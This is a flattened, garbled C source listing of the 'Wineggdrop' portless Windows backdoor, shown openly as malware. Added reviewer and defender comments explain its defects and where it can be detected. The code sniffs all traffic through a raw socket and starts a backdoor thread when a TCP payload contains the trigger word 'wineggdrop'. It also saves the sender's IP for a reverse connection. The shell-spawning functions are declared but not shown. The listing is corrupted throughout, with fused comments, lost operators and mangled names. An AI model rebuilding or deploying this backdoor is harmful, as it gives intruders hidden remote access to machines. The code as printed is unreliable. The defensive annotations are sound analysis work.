Wineggdrop back door V1.0 source code


// ****************************************************************************
// Version: v1.0
// CODER: Wineggdrop
// Date Release: null
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test Platform: Win 2K Pro and Server SP4
// Compiled On: LCC 3.0, May Compile On VC 6.0 (not tested yet)
// ****************************************************************************

#include #include #include

// NOTE(review): this listing has been flattened onto single lines, so everything after the first
// `//` on a line is commented out and the code is not compilable as shown. The macro names below
// are also case-mangled relative to their later uses (`sio_rcvall` here vs. the `SIO_RCVALL`
// passed to WSAIoctl in DoSniffing; `max_pa_len` vs. the `max_pack_len` that sizes the receive
// buffer). The text is left byte-for-byte as found.
// Defender note: SIO_RCVALL is the Winsock ioctl that switches a raw socket into "receive all"
// mode. Its use from a user-mode process is the characteristic signal of this portless sniffer:
// there is no listening port to show up in a socket listing, so host-side auditing of raw-socket
// creation and of this ioctl is where to look — presumably the call needs elevated privilege;
// confirm against the platform documentation.
// some structures to define # define ip_hdrincl 2 # define sio_rcvall _wsaiow (ioc_vendor, 1) #define max_pa_len 65535 # define max_addr_len 16 # define max_hostname_lan 255

/*
 * IPv4 header as it arrives from the raw socket (20 bytes, no padding).
 * Only h_lenver, proto and sourceIP are read by the decoders in this file.
 */
typedef struct _iphdr {
    unsigned char  h_lenver;        /* low nibble: header length in 32-bit words (see DecodeIPPack) */
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;           /* transport protocol number, compared with IPPROTO_TCP */
    unsigned short checksum;
    unsigned int   sourceIP;        /* handed to inet_ntoa() as-is, i.e. not byte-swapped here */
    unsigned int   destIP;
} IP_HEADER;

/*
 * TCP header as it follows the IP header in the received frame.
 * DecodeTCPPack reads th_sport/th_dport (via ntohs) and th_lenres; the rest is unused here.
 */
typedef struct _tcphdr {
    USHORT        th_sport;
    USHORT        th_dport;
    unsigned int  th_seq;
    unsigned int  th_ack;
    unsigned char th_lenres;        /* high nibble: data offset in 32-bit words (see DecodeTCPPack) */
    unsigned char th_flag;
    USHORT        th_win;
    USHORT        th_sum;
    USHORT        th_urp;
} TCP_HEADER;
/* End Of Structure */

// NOTE(review): the marker "// Global Variable" has been fused with the declaration that follows,
// so in this listing both globals are commented out. As used below, `SourceIPAddress` is the
// buffer DecodeIPPack fills with strncpy(..., MAX_ADDR_LEN) from inet_ntoa(), and `BackDoorPort`
// is the int main() sets from argv[1] (default 1982). Both are written from the sniffing loop and
// presumably read by the StartBackDoor thread, whose body is not on this page; no synchronization
// is visible in this file.
// Global VariableChar SourceIpaddress [MAX_ADDR_LEN]; // Hold The Source IP (this Can Be Used To Do Reverse Connection) INT Backdoorport = 0; // The Port Back Door Will Bind

// NOTE(review): of the nine prototypes below only InitSocket, DoSniffing, DecodeIPPack and
// DecodeTCPPack (plus main) have definitions in this listing; IsWin2KOrAbove, StartBackDoor,
// GetABackDoorShell, SendSocket and ReceiveMessageFromSocket are declared but their bodies are
// not on this page. The "/ N" inside the string literals is a garbled "\n" escape from the copy,
// and "Functionint main" is the comment "// main Function" fused with "int main". Text preserved
// as found.
// Review: argv[1] is converted with atoi(), which yields 0 for non-numeric input and is not
// range-checked, so a value outside 1..65535 is not rejected here; the only other validation in
// main is the IsWin2KOrAbove() gate, whose implementation is not on this page.
// Function prototype declaration // ------------------------------------------- -------------------------------------------------- --------- BOOL InitSocket (); BOOL DoSniffing (); BOOL DecodeIPPack (const char * Buffer, const int BufferSize); BOOL DecodeTCPPack (const char * TCPBuffer, const int BufferSize); BOOL IsWin2KOrAbove (); DWORD WINAPI StartBackDoor (LPVOID Para); BOOL GetABackDoorShell (const SOCKET ListenSocket); BOOL SendSocket (const SOCKET ClientSocket, const char * Message); unsigned int ReceiveMessageFromSocket (const SOCKET ClientSocket, char * Buffer, const int BufferSize); // - -------------------------------------------------- -------------------------------------------------- // End Of fucntion ProtoType Declaration // main Functionint main (int argc, char * argv []) {if (! IsWin2KOrAbove ()) // This System Running This Program Is Not Win 2K Or Above {printf ( "The Program Must Run Under Win 2k or Above OS / N "); // Display this message return -1; // quit the program}

IF (Argc == 2) // We get argument backdoorport = atoi (argv [1]); // argument one is the back door's port else // no argument backdoorport = 1982; // back door's port will be defined on 1982

IF (! INITSOCKET ()) // Fail to Initize Socket {Printf ("Fail to Start Up Winsock / N"); // Display Error Message Return -1; // Quit the Program} DOSNIFFING (); // DO Sniffeng Return 0; // quit the program} // end of main function

// NOTE(review): as copied, the function body ends right after the failing-WSAStartup branch
// (`{return false;}`); the `return TRUE;` and the closing brace of InitSocket are missing from
// this listing, so "// end of initsocket function" is attached to the wrong brace. The call
// requests Winsock version 2.2 and the WSADATA result is otherwise unused.
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to itize socket // Return Type: Boolean // Parameters: null // this is to simple, I Won't comment it // ------------------------------------------------------------------------------------------------------------------------------------------------ ------------------------------ BOOL INITSOCKET () {Wsadata Data; Word Ver; Ver = MakeWord (2, 2) ; If (WSAStartup (Ver, & Data)! = 0) {return false;} // end of initsocket function

// NOTE(review): DoSniffing spans every line down to "// end of dosniffeng function". Identifiers
// are case-mangled by the copy (dosnifing, Socketraw/SocketRaw, clossoSocket, membSet, Recv) and
// the "/ N" in string literals is a garbled "\n". Text preserved as found.
// Defects visible in the copied logic, left unfixed:
//  - `pHostent = malloc(sizeof(struct hostent))` is immediately overwritten by the return value
//    of gethostbyname(), so the malloc'd block leaks, and the later `free(pHostent)` frees the
//    pointer gethostbyname() returned instead — presumably library-owned storage, in which case
//    that free is undefined behaviour; confirm against the Winsock documentation.
//  - The bind address is taken from h_addr_list[0] only ("We Only Check The First NIC"), and
//    h_length is used as the memcpy size without a check against sizeof sa.sin_addr.
//  - `Length` from recv() is forwarded to DecodeIPPack as BufferSize, but neither decoder bounds
//    its header or payload reads by it (see the notes on DecodeIPPack and DecodeTCPPack).
//  - After a trigger the loop blocks in WaitForSingleObject(BackDoorThread, INFINITE); the thread
//    handle is never closed, and CreateThread's return is not checked before it is waited on.
// Defender note: nothing here listens on a port — the listening socket, if any, is created by the
// StartBackDoor thread, whose body is not on this page. What this routine does expose is a raw
// IPPROTO_IP socket bound to the host's first address with SIO_RCVALL enabled, and the trigger is
// the plaintext TCP payload substring checked in DecodeTCPPack; a host-side raw-socket audit and a
// network content signature are the corresponding detection points.
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to do none-driver sniffing // return type: boolean // parameters: null // -------------------------------------------------- --------------------- Bool dosnifing () {Int longth = 0; // variable to hold the receive buffer length char recvbuf [max_pack_len] = {0}; // receive buffer socket socketraw = invalid_socket; // raw socket

Socketraw = socket (AF_INET, SOCK_RAW, IPPROTO_IP); // Create a Raw Socket IF (SocketRaw == Invalid_socket) // Fail to Create a Raw Socket {Printf ("Fail to Create A Raw Socket / N"); // Display Error Message Return False; // Return False}

Char far name [max_hostname_lan];

IF (gethostname (name, max_hostname_lan) == Socket_ERROR) // Fail to get the host name {printf ("fail to get host name / n"); // Display error message clossoSocket (socketraw); // Close the Raw Socket Created Return False; // Return False}

// The Below Is The NIC Stuff struct hostent FAR * pHostent; pHostent = (struct hostent *) malloc (sizeof (struct hostent)); // Allocate Hostent Buffer pHostent = gethostbyname (name); SOCKADDR_IN sa; sa.sin_family = AF_INET ; // That's Internet = htons (0); // Any Port avariable on the OS if (phostent-> h_addr_list [0]! = 0) // We Only Check The First Nic {Memcpy (& sa.sin_addr .S_un.s_addr, phostent-> h_addr_list [0], phostent-> h_length); // We use the first nic as the sniffing subject} else // Well, The first nic is not valid {printf ("Get Host by Name Fails / n "); // Display Error Message Free (PHOSTENT); // Free The Hostent Buffer CloseSocket (SocketRaw); Return False; // Return False;} Free (Phostent); // Free The Hostent Bufferif (Bind SocketRaw, (PSOCKADDR) & SA, SIZEOF (SA)) == SOCKET_ERROR) // Bind The Raw Socket On The First NIC, But Fails {Printf ("Fail To Bind / N"); // Display Error Message CloseSocket (Socketr AW); // Close The Raw Socket Return False; // Return False}

// Forget About The Below a Few Lines, They Are Just A Static Routine To Do The None_Driver Sniffing (Some Sort of Must-Have "DWORD DWBufferlen [10]; DWORD DWBUFFERINLEN = 1; DWORD DWBYTESRETURNED = 0;

if (WSAIoctl (SocketRaw, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwBytesReturned, NULL, NULL) == SOCKET_ERROR) {closesocket (SocketRaw); return FALSE;}

While (true) // sniffing starts here with forever loop {membSet (Recvbuf, 0, sizeof (recvbuf)); // reset the receive buffer length = Recv (socketraw, recvbuf, sizeof (recvbuf), 0); // Try To Receive Data if (Length == SOCKET_ERROR) // Get Error As Receiving Data {printf ( "Fail To Receive Data / n"); // Display Error Message break; // Leave The Loop} if (DecodeIPPack (recvBuf, Length )) // Decode The Buffer Received, And The Active Code Is Found {printf ( "Bingo, The BackDoor Is Activated On Port% d / n", BackDoorPort); // We Are Going To Activate The BackDoor DWORD dwThreadID; HANDLE BackDoorThread = CreateThread (NULL, 0, & StartBackDoor, NULL, 0, & dwThreadID); // Create The Back Door Thread WaitForSingleObject (BackDoorThread, INFINITE); // Wait Until The Back Door Ends}} closesocket (SocketRaw); // Close The Raw Socket Return True; // Return} // end of dosniffeng function

// NOTE(review): garbling in the copy: `if ((Protocol = IPPROTO_TCP)!)` stands for the original
// `if (Protocol != IPPROTO_TCP)` (as copied it would be an assignment and the test always true),
// and `DecodeTCPPack (Buffer IPLength, BufferSize)` has lost the `+` of `Buffer + IPLength`.
// Text preserved as found.
// Defects visible in the copied logic, left unfixed:
//  - Buffer is cast to IP_HEADER* and its fields read with no check that BufferSize is at least
//    sizeof(IP_HEADER) (20 bytes); BufferSize is never consulted in this function at all.
//  - The header length is (h_lenver & 0xf) * sizeof(unsigned long) — 4-byte words on the Win32
//    target this was written for, giving 0..60 as computed (a valid header is 20..60). It is
//    neither checked against BufferSize nor subtracted from the BufferSize forwarded to
//    DecodeTCPPack, so the TCP decoder is told the buffer is longer than it is.
//  - SourceIPAddress is filled with strncpy(..., MAX_ADDR_LEN); inet_ntoa() yields at most 15
//    characters, so the 16-byte global stays terminated, but the value is taken from an
//    unauthenticated packet and is the reverse-connection target named in the global's comment.
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to decode the ip packer // Return Type: Boolean // Parameters: 1.const char * buffer -> The received buffer // 2.const int bufferSize -> The receive buffer size // -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------- Bool Decodeippack (const char * Buffer, const int BufferSize) {IP_HEADER * pIpheader; // IP Header SOCKADDR_IN saSource, saDest; pIpheader = (IP_HEADER *) Buffer; // Transfer The Buffer Into IP Header Form int Protocol = pIpheader-> proto; // Get The Protocol if ((Protocol = IPPROTO_TCP)!) // Not TCP Protocol {return FALSE; // return False Since We Only Interest In TCP Protocol} saSource.sin_addr.s_addr = pIpheader-> sourceIP; strncpy (SourceIPAddress, inet_ntoa (saSource. SIN_ADDR), MAX_ADDR_LEN); // Get The Source IP (Important for Doing Reverse Connection)

int IPLength = sizeof (unsigned long) * (pIpheader-> h_lenver & 0xf); // Get The IP Length return DecodeTCPPack (Buffer IPLength, BufferSize); // Decode TCP Packer} // End Of DecodeIPPack Function

// NOTE(review): garbling in the copy: the signature lacks its closing parenthesis, `TCPBuffer
// TcpHeaderLen` has lost its `+`, "The TCP DataiSourcePort" fuses a comment with the following
// statement, and the bare `return;` in the trigger branch stands for `return TRUE;` (the comment
// beside it says so). The trailing "[CODE]" is forum markup, not source. Text preserved as found.
// Defects visible in the copied logic, left unfixed:
//  - TcpHeaderLen = (th_lenres >> 4) * sizeof(unsigned long) is never checked against BufferSize,
//    and BufferSize is otherwise unused, so TcpData can point past the received data.
//  - strstr(TcpData, "wineggdrop") scans until a NUL. The caller zeroes its receive buffer before
//    every recv(), so a terminator is normally present somewhere, but a frame that fills the
//    buffer exactly, or a data offset beyond it, reads out of bounds.
//  - iSourcePort/iDestPort are converted with ntohs() and only printed; the trigger test does not
//    look at ports, so any TCP segment whose payload carries the substring activates the routine.
// Defender note: the activation condition is a fixed, plaintext payload substring, which a network
// IDS content rule can match directly; the printf on activation also leaves a console trace.
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to decode the TCP Packer // Return Type: Boolean // Parameters: 1.const char * TCPBuffer -> The tcp buffer // 2.const int bufferSize -> The tcp buffer size // ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------- Bool Decodetcppck (Const Char * TCPBuffer, const Int buffersize {TCP_HEADER * PTCPHEADER; // TCP Header Int ISourcePort, IDestport; // Source Port and Destport

pTcpHeader = (TCP_HEADER *) TCPBuffer; // Transfer The Buffer Into TCP Header Form int TcpHeaderLen = pTcpHeader-> th_lenres >> 4; // Get The TCP Leader Length TcpHeaderLen * = sizeof (unsigned long); char * TcpData = TCPBuffer TcpHeaderLen; // Get The TCP DataiSourcePort = ntohs (pTcpHeader-> th_sport); // Get The Source Port iDestPort = ntohs (pTcpHeader-> th_dport); // Get The Destination Port if (strstr (TcpData, "wineggdrop")! = NULL) // if The TCP Data Contains a Word "WineggDrop", The Bingo {Printf ("% s:% D -> Local:% D / R / N", SourceIpaddress, ISourceport, Idestport ); // display a message return; // Return True (The Back Door Will Be Activated Soon)} Return False; // We Didn't Receive An Active Code, Return False} // End of Decodetcpck Function [CODE]

